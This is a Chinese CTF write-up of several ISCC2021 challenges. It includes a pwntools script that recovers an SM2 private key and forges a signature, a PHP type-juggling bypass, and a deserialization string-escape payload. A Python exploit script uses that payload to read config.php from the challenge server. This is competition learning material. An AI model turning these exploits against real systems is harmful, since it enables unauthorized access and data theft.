<h2 id="变异的SM2"><a class="header-anchor" href="#变异的SM2">¶</a>变异的SM2</h2>
<p>密码学题目，我不擅长这方面，果断搜下关键处代码，果然搜到了原题</p>
<p>该题目是2020ByteCTF决赛的题目threshold</p>
<p>搜到的一个WP链接：<a target="_blank" rel="noopener" href="https://ctf.njupt.edu.cn/545.html">https://ctf.njupt.edu.cn/545.html</a></p>
<p>需要改下脚本，把server.py和写的脚本放到同一路径下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> gmssl <span class="keyword">import</span> func, sm2</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> server</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">&quot;129.211.59.129&quot;</span>, <span class="number">20001</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># context.log_level = &#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">pk = <span class="built_in">int</span>(r.recvline().split(<span class="string">b&quot;:&quot;</span>)[<span class="number">1</span>].decode(), <span class="number">16</span>)</span><br><span class="line">pks = <span class="built_in">int</span>(r.recvline().split(<span class="string">b&quot;:&quot;</span>)[<span class="number">1</span>].decode(), <span class="number">16</span>)</span><br><span class="line">log.info(<span class="string">f&quot;pk: <span class="subst">&#123;pk&#125;</span>&quot;</span>)</span><br><span class="line">log.info(<span class="string">f&quot;pks: <span class="subst">&#123;pks&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">backdoor = <span class="string">b&#x27;0&#x27;</span>*<span class="number">128</span> + <span class="string">b&#x27;1&#x27;</span></span><br><span class="line">r.sendlineafter(<span class="string">b&quot;op: &quot;</span>, <span class="string">b&quot;sign&quot;</span>)</span><br><span class="line">r.sendlineafter(<span class="string">b&quot;backdoor:&quot;</span>, backdoor)</span><br><span class="line">sks = <span class="built_in">int</span>(r.recvline(), <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">n = <span class="number">115792089210356248756420345214020892766061623724957744567843809356293439045923</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># pks = (sk + 1) * sks ^ -1</span></span><br><span class="line"></span><br><span class="line">sk = inverse(pks * sks, n) - <span class="number">1</span></span><br><span class="line">log.info(<span class="string">f&quot;sk: <span class="subst">&#123;sk&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">data = <span class="string">b&#x27;Hello, Welcome to ISCC2021!&#x27;</span></span><br><span class="line">e = <span class="built_in">int</span>(data.<span class="built_in">hex</span>(), <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">k = <span class="number">2</span></span><br><span class="line">tsm2 = server.TSM2(<span class="string">&#x27;0xdeadbeaf&#x27;</span>)</span><br><span class="line">P1_P2 = tsm2._kg(k, server.G)</span><br><span class="line">R = <span class="built_in">int</span>(P1_P2[:<span class="number">64</span>], <span class="number">16</span>) + e</span><br><span class="line"></span><br><span class="line">s = inverse(<span class="number">1</span>+sk, n) * (k - R*sk) % n</span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">b&quot;op: &quot;</span>, <span class="string">b&quot;verify&quot;</span>)</span><br><span class="line">r.sendlineafter(<span class="string">b&quot;msg:&quot;</span>, data)</span><br><span class="line">r.sendlineafter(<span class="string">b&quot;sign:&quot;</span>, <span class="built_in">hex</span>(R)[<span class="number">2</span>:].zfill(<span class="number">64</span>) + <span class="built_in">hex</span>(s)[<span class="number">2</span>:].zfill(<span class="number">64</span>))</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>flag如下</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/eee34db53ae938d55a0f3ca08e7b07ce.png"  alt="image-20210518144852630"></p>
<h1>WEB</h1>
<h2 id="ISCC客服冲冲冲（一）"><a class="header-anchor" href="#ISCC客服冲冲冲（一）">¶</a>ISCC客服冲冲冲（一）</h2>
<p>题目大致意思是要给左面的客服一号投票超过右面的投票</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/8633f7a3fe0f999651aa82969214b696.png"  alt="image-20210518122525606"></p>
<ul>
<li>WP1：其实第一次做的时候直接尝试一直点左边的投票，结果还真的超过了右边的票数，直接给了flag。</li>
</ul>
<p>题目原意应该是不用手动点而是用其他方法的，不过最终也算拿到了flag</p>
<ul>
<li>WP2：互换左右投票的ID，这样自动加的票就会加给左边的，等待计时结束即可</li>
<li>其它WP：由于是前端控制，所以解法很多，比如用连点器，或者在 Console 里搜一下，有个 votes，直接设置，这道题可以说有非常多解题方法了，这里就不再过多阐述</li>
</ul>
<h2 id="这是啥"><a class="header-anchor" href="#这是啥">¶</a>这是啥</h2>
<p>查看源代码发现如图所示代码，一看就是JSFuck</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/f6b7238a89a96abeebb69ab68b03f63c.png"  alt="image-20210518122645074"></p>
<p>直接复制到控制台回车</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/627d8eb450084dca4ab7345a85a2c6e2.png"  alt="image-20210518122845010"></p>
<h2 id="Web01"><a class="header-anchor" href="#Web01">¶</a>Web01</h2>
<p>打开便提示Why don’t you take a look at robots.txt?</p>
<p>那就访问robots.txt看看呗，发现Disallow: /src/code/code.txt</p>
<p>所以就访问http://39.96.91.106:7040/code/code.txt</p>
<p>发现几个判断条件，满足条件便会输出flag</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (strlen(<span class="variable">$_GET</span>[<span class="string">&#x27;password&#x27;</span>]) &lt; <span class="number">8</span> &amp;&amp; <span class="variable">$_GET</span>[<span class="string">&#x27;password&#x27;</span>] &gt; <span class="number">9999999</span>)</span><br></pre></td></tr></table></figure>
<p>参数长度小于8但数值还要大于9999999，直接用科学计数法如1e9绕过即可</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (strpos (<span class="variable">$_GET</span>[<span class="string">&#x27;password&#x27;</span>], <span class="string">&#x27;*-*&#x27;</span>) !== <span class="literal">FALSE</span>)</span><br></pre></td></tr></table></figure>
<p>要求参数里要含有*-*</p>
<p>所以最终请求参数为?password=1e9*-*</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/8f5055abb4770740a35044a7e8959e13.png"  alt="image-20210518123714229"></p>
<h2 id="ISCC客服一号冲冲冲（二）"><a class="header-anchor" href="#ISCC客服一号冲冲冲（二）">¶</a>ISCC客服一号冲冲冲（二）</h2>
<p>该题目其实是Bugku的Login4 (CBC字节翻转攻击)</p>
<p>所以不再写WP了，留一个Je3写的WP链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/jvkyvly/article/details/116755861">ISCC ISCC客服一号冲冲冲（二）</a></p>
<h2 id="登录"><a class="header-anchor" href="#登录">¶</a>登录</h2>
<p>WP来自CSDN中<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_51078229">huamanggg</a>师傅</p>
<p>源码泄露www.zip<br>
拿到代码**，<strong>发现有注册页面</strong>，<strong>随便注册一个页面</strong>，<strong>登陆后有一个update信息</strong>，**可以上传文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">require_once</span>(<span class="string">&#x27;class.php&#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;username&#x27;</span>] == <span class="literal">null</span>) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;Login First&#x27;</span>); </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;phone&#x27;</span>] &amp;&amp; <span class="variable">$_POST</span>[<span class="string">&#x27;email&#x27;</span>] &amp;&amp; <span class="variable">$_POST</span>[<span class="string">&#x27;nickname&#x27;</span>] &amp;&amp; <span class="variable">$_FILES</span>[<span class="string">&#x27;photo&#x27;</span>]) &#123;</span><br><span class="line"></span><br><span class="line">        <span class="variable">$username</span> = <span class="variable">$_SESSION</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">        <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/^\d&#123;11&#125;$/&#x27;</span>, <span class="variable">$_POST</span>[<span class="string">&#x27;phone&#x27;</span>]))</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;Invalid phone&#x27;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/^[_a-zA-Z0-9]&#123;1,10&#125;@[_a-zA-Z0-9]&#123;1,10&#125;\.[_a-zA-Z0-9]&#123;1,10&#125;$/&#x27;</span>, <span class="variable">$_POST</span>[<span class="string">&#x27;email&#x27;</span>]))</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;Invalid email&#x27;</span>);</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[^a-zA-Z0-9_]/&#x27;</span>, <span class="variable">$_POST</span>[<span class="string">&#x27;nickname&#x27;</span>]) || strlen(<span class="variable">$_POST</span>[<span class="string">&#x27;nickname&#x27;</span>]) &gt; <span class="number">10</span>)</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;Invalid nickname&#x27;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="variable">$file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;photo&#x27;</span>];</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$file</span>[<span class="string">&#x27;size&#x27;</span>] &lt; <span class="number">5</span> <span class="keyword">or</span> <span class="variable">$file</span>[<span class="string">&#x27;size&#x27;</span>] &gt; <span class="number">1000000</span>)</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;Photo size error&#x27;</span>);</span><br><span class="line"></span><br><span class="line">        move_uploaded_file(<span class="variable">$file</span>[<span class="string">&#x27;tmp_name&#x27;</span>], <span class="string">&#x27;upload/&#x27;</span> . md5(<span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>]));</span><br><span class="line">        <span class="variable">$profile</span>[<span class="string">&#x27;phone&#x27;</span>] = <span class="variable">$_POST</span>[<span class="string">&#x27;phone&#x27;</span>];</span><br><span class="line">        <span class="variable">$profile</span>[<span class="string">&#x27;email&#x27;</span>] = <span class="variable">$_POST</span>[<span class="string">&#x27;email&#x27;</span>];</span><br><span class="line">        <span class="variable">$profile</span>[<span class="string">&#x27;nickname&#x27;</span>] = <span class="variable">$_POST</span>[<span class="string">&#x27;nickname&#x27;</span>];</span><br><span class="line">        <span class="variable">$profile</span>[<span class="string">&#x27;photo&#x27;</span>] = <span class="string">&#x27;upload/&#x27;</span> . md5(<span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line"></span><br><span class="line">        <span class="variable">$user</span>-&gt;update_profile(<span class="variable">$username</span>, serialize(<span class="variable">$profile</span>));</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;Update Profile Success!&lt;a href=&quot;profile.php&quot;&gt;Your Profile&lt;/a&gt;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>继续看源码**，<strong>得到上传路径</strong>，<strong>但是MD5加密了</strong>，**所以后缀是没有了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">move_uploaded_file(<span class="variable">$file</span>[<span class="string">&#x27;tmp_name&#x27;</span>], <span class="string">&#x27;upload/&#x27;</span> . md5(<span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>]));</span><br></pre></td></tr></table></figure>
<p>这样一来**，**传配置文件也是没用了<br>
看到了config.php里面有flag</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$config</span>[<span class="string">&#x27;hostname&#x27;</span>] = <span class="string">&#x27;127.0.0.1&#x27;</span>;</span><br><span class="line">    <span class="variable">$config</span>[<span class="string">&#x27;username&#x27;</span>] = <span class="string">&#x27;root&#x27;</span>;</span><br><span class="line">    <span class="variable">$config</span>[<span class="string">&#x27;password&#x27;</span>] = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="variable">$config</span>[<span class="string">&#x27;database&#x27;</span>] = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="variable">$flag</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>class.php里面的filter函数里面有preg_replace**，**可能漏洞出现在这里</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$string</span></span>) </span>&#123;</span><br><span class="line">        <span class="variable">$escape</span> = <span class="keyword">array</span>(<span class="string">&#x27;\&#x27;&#x27;</span>, <span class="string">&#x27;\\\\&#x27;</span>);</span><br><span class="line">        <span class="variable">$escape</span> = <span class="string">&#x27;/&#x27;</span> . implode(<span class="string">&#x27;|&#x27;</span>, <span class="variable">$escape</span>) . <span class="string">&#x27;/&#x27;</span>;</span><br><span class="line">        <span class="variable">$string</span> = preg_replace(<span class="variable">$escape</span>, <span class="string">&#x27;_&#x27;</span>, <span class="variable">$string</span>);</span><br><span class="line"></span><br><span class="line">        <span class="variable">$safe</span> = <span class="keyword">array</span>(<span class="string">&#x27;select&#x27;</span>, <span class="string">&#x27;insert&#x27;</span>, <span class="string">&#x27;update&#x27;</span>, <span class="string">&#x27;delete&#x27;</span>, <span class="string">&#x27;where&#x27;</span>);</span><br><span class="line">        <span class="variable">$safe</span> = <span class="string">&#x27;/&#x27;</span> . implode(<span class="string">&#x27;|&#x27;</span>, <span class="variable">$safe</span>) . <span class="string">&#x27;/i&#x27;</span>;</span><br><span class="line">        <span class="keyword">return</span> preg_replace(<span class="variable">$safe</span>, <span class="string">&#x27;hacker&#x27;</span>, <span class="variable">$string</span>);</span><br></pre></td></tr></table></figure>
<p>结合这个猜测是<strong>反序列化的字符串逃逸</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$photo</span> = base64_encode(file_get_contents(<span class="variable">$profile</span>[<span class="string">&#x27;photo&#x27;</span>]));</span><br></pre></td></tr></table></figure>
<p>先分析一下这个过滤：</p>
<ul>
<li>implode()函数：<code>implode(separator**,**array)</code><br>
把数组里的元素以某字符连接</li>
<li>preg_replace()函数：<code>preg_replace ( mixed $pattern **,** mixed $replacement **,** mixed $subject</code><br>
用第三个参数匹配第一个参数的正则**，**换成第二个参数</li>
</ul>
<p>第一个preg_replace()：<br>
把<code>'</code>和<code>\\</code>换成<code>_</code></p>
<p>第二个preg_replace():<br>
匹配<code>/select|insert|update|delete|where/</code>换成hacker<br>
其他的几个都是六个字符**，<strong>和hacker一样长</strong>，**所以我们选择where来对他进行逃逸</p>
<p>当我们更新了信息后**，<strong>执行这个方法</strong>，**经过filter过滤后再赋值到$username里面</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">update_profile</span>(<span class="params"><span class="variable">$username</span>, <span class="variable">$new_profile</span></span>) </span>&#123;</span><br><span class="line">        <span class="variable">$username</span> = <span class="built_in">parent</span>::filter(<span class="variable">$username</span>);</span><br><span class="line">        <span class="variable">$new_profile</span> = <span class="built_in">parent</span>::filter(<span class="variable">$new_profile</span>);</span><br><span class="line"></span><br><span class="line">        <span class="variable">$where</span> = <span class="string">&quot;username = &#x27;<span class="subst">$username</span>&#x27;&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">parent</span>::update(<span class="keyword">$this</span>-&gt;table, <span class="string">&#x27;profile&#x27;</span>, <span class="variable">$new_profile</span>, <span class="variable">$where</span>);</span><br></pre></td></tr></table></figure>
<p>生成这样的序列化字符串</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:<span class="number">4</span>:&#123;s:<span class="number">5</span>:<span class="string">&quot;phone&quot;</span>;s:<span class="number">11</span>:<span class="string">&quot;11111111111&quot;</span>;s:<span class="number">5</span>:<span class="string">&quot;email&quot;</span>;s:<span class="number">10</span>:<span class="string">&quot;123@qq.com&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;nickname&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;123&quot;</span>;s:<span class="number">5</span>:<span class="string">&quot;photo&quot;</span>;s:<span class="number">39</span>:<span class="string">&quot;upload/25a452927110e39a345a2511c57647f2&quot;</span>;&#125;</span><br></pre></td></tr></table></figure>
<p>既然photo会被md5加密**，<strong>我们就逃逸出来</strong>，<strong>构造一个photo出来</strong>，<strong>所以 从nickname里面下手</strong>，**把photo的内容改成config.php</p>
<p>一个where换成hacker会多一个字符**，**<code>&quot;;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</code>这里一共有33个字符 **，**所以写33个where就刚刚好把伪造的photo给挤出去了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere<span class="string">&quot;;s:5:&quot;</span>photo<span class="string">&quot;;s:10:&quot;</span>config.php<span class="string">&quot;;&#125;</span></span><br></pre></td></tr></table></figure>
<p>问题又来了**，**太长了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[^a-zA-Z0-9_]/&#x27;</span>, <span class="variable">$_POST</span>[<span class="string">&#x27;nickname&#x27;</span>]) || strlen(<span class="variable">$_POST</span>[<span class="string">&#x27;nickname&#x27;</span>]) &gt; <span class="number">10</span>)</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;Invalid nickname&#x27;</span>);</span><br></pre></td></tr></table></figure>
<p>绕过方法是<strong>数组绕过</strong>：</p>
<p>数组绕过的话**，<strong>payload还得改</strong>，**要用<code>&quot;;&#125;</code>来闭合了<br>
格式是这样的：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:<span class="number">4</span>:&#123;s:<span class="number">5</span>:<span class="string">&quot;phone&quot;</span>;s:<span class="number">11</span>:<span class="string">&quot;11111111111&quot;</span>;s:<span class="number">5</span>:<span class="string">&quot;email&quot;</span>;s:<span class="number">10</span>:<span class="string">&quot;123@qq.com&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;nickname&quot;</span>;a:<span class="number">1</span>:&#123;i:<span class="number">0</span>;s:<span class="number">3</span>:<span class="string">&quot;123&quot;</span>;&#125;s:<span class="number">5</span>:<span class="string">&quot;photo&quot;</span>;s:<span class="number">39</span>:<span class="string">&quot;upload/d41d8cd98f00b204e9800998ecf8427e&quot;</span>;&#125;</span><br></pre></td></tr></table></figure>
<p>所以<code>&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</code>长度为34<br>
payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere<span class="string">&quot;;&#125;s:5:&quot;</span>photo<span class="string">&quot;;s:10:&quot;</span>config.php<span class="string">&quot;;&#125;</span></span><br></pre></td></tr></table></figure>
<p>改为数组形式<br>
<img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/20210502174350475.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxMDc4MjI5,size_16,color_FFFFFF,t_70"  alt="在这里插入图片描述"></p>
<p>成功拿到config.php的源码</p>
<p><img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/img_convert/d9a7ee8c5d19e10820acb5ac2b65c7d8.png"  alt="image-20210518125123108"></p>
<p>一把嗦脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*- encoding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Fuck</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span>(<span class="params">self</span>):</span></span><br><span class="line">        self.url = <span class="string">&quot;http://39.96.91.106:7010/&quot;</span></span><br><span class="line">        self.s = requests.session()</span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">register</span>(<span class="params">self, username</span>):</span></span><br><span class="line">        url = self.url + <span class="string">&quot;register.php&quot;</span></span><br><span class="line">        data = &#123;<span class="string">&quot;username&quot;</span>: username, <span class="string">&quot;password&quot;</span>: <span class="string">&quot;123123&quot;</span>&#125;</span><br><span class="line">        self.s.post(url, data=data)</span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">login</span>(<span class="params">self, username</span>):</span></span><br><span class="line">        url = self.url + <span class="string">&quot;index.php&quot;</span></span><br><span class="line">        data = &#123;<span class="string">&quot;username&quot;</span>: username, <span class="string">&quot;password&quot;</span>: <span class="string">&quot;123123&quot;</span>&#125;</span><br><span class="line">        self.s.post(url, data=data)</span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">update</span>(<span class="params">self</span>):</span></span><br><span class="line">        url = self.url + <span class="string">&quot;update.php&quot;</span></span><br><span class="line">        files = &#123;<span class="string">&quot;photo&quot;</span>: (<span class="string">&quot;fuck&quot;</span>, <span class="string">&quot;123123123123123123123123123123&quot;</span>)&#125;</span><br><span class="line">        data = &#123;<span class="string">&quot;phone&quot;</span>: <span class="string">&quot;11111111111&quot;</span>, <span class="string">&quot;email&quot;</span>: <span class="string">&quot;123@qq.com&quot;</span>, <span class="string">&quot;nickname[]&quot;</span>: </span><br><span class="line">            <span class="string">&#x27;&#x27;&#x27;wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere&quot;;&#125;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;&#x27;&#x27;&#x27;</span></span><br><span class="line">        &#125;</span><br><span class="line">        self.s.post(url, data=data, files=files)</span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">profile</span>(<span class="params">self</span>):</span></span><br><span class="line">        url = self.url + <span class="string">&quot;profile.php&quot;</span></span><br><span class="line">        res = self.s.get(url)</span><br><span class="line">        flag = re.findall(re.<span class="built_in">compile</span>(<span class="string">r&#x27;(?&lt;=base64,).*(?=&quot; class)&#x27;</span>), res.text)</span><br><span class="line">        flag = re.findall(re.<span class="built_in">compile</span>(<span class="string">r&#x27;(?&lt;=flag = \&#x27;).*(?=\&#x27;;)&#x27;</span>), base64.b64decode(flag[<span class="number">0</span>]).decode())</span><br><span class="line">        <span class="built_in">print</span>(flag[<span class="number">0</span>])</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    username = <span class="string">&quot;&quot;</span></span><br><span class="line">    fuck = Fuck()</span><br><span class="line">    fuck.register(username)</span><br><span class="line">    fuck.login(username)</span><br><span class="line">    fuck.update()</span><br><span class="line">    fuck.profile()</span><br></pre></td></tr></table></figure>
<h2 id="which-is-the-true-iscc"><a class="header-anchor" href="#which-is-the-true-iscc">¶</a>which is the true iscc</h2>
<p>此WP还是来自CSDN中<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_51078229">huamanggg</a>师傅（我太菜了）</p>
<p>注释了一些提示</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;/?whatareyounongshane=src&quot;</span>&gt;</span>我真的是源码?<span class="tag">&lt;/<span class="name">a</span>&gt;</span> </span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;/?whatareyounongshane=cmd&quot;</span>&gt;</span>干点好事!<span class="tag">&lt;/<span class="name">a</span>&gt;</span> </span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;/?whatareyounongshane=upload&quot;</span>&gt;</span>送点东西!<span class="tag">&lt;/<span class="name">a</span>&gt;</span> </span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;/?whatareyounongshane=tellmetruth&quot;</span>&gt;</span>快告诉我真相!<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>源码里的ISCC_Command类里面的__destruct方法可以执行命令**，**这里应该是最终要走到的点</p>
<p>这样的话就追着cmd变量来看**，<strong>明显看类名知道</strong>，**会在ISCC_ResetCMD类里面对cmd进行重新赋值<br>
这里的__destruct方法必须得满足这个才能重置命令</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;name&#x27;</span>] === <span class="string">&#x27;isccIsCciScc1scc&#x27;</span>) &#123;            <span class="variable">$cmd</span> = <span class="keyword">$this</span>-&gt;new_cmd;        &#125;</span><br></pre></td></tr></table></figure>
<p>一般来说**，<strong>想要控制$_SESSION的值</strong>，<strong>都是使用变量覆盖来做的</strong>，**这题应该也不例外</p>
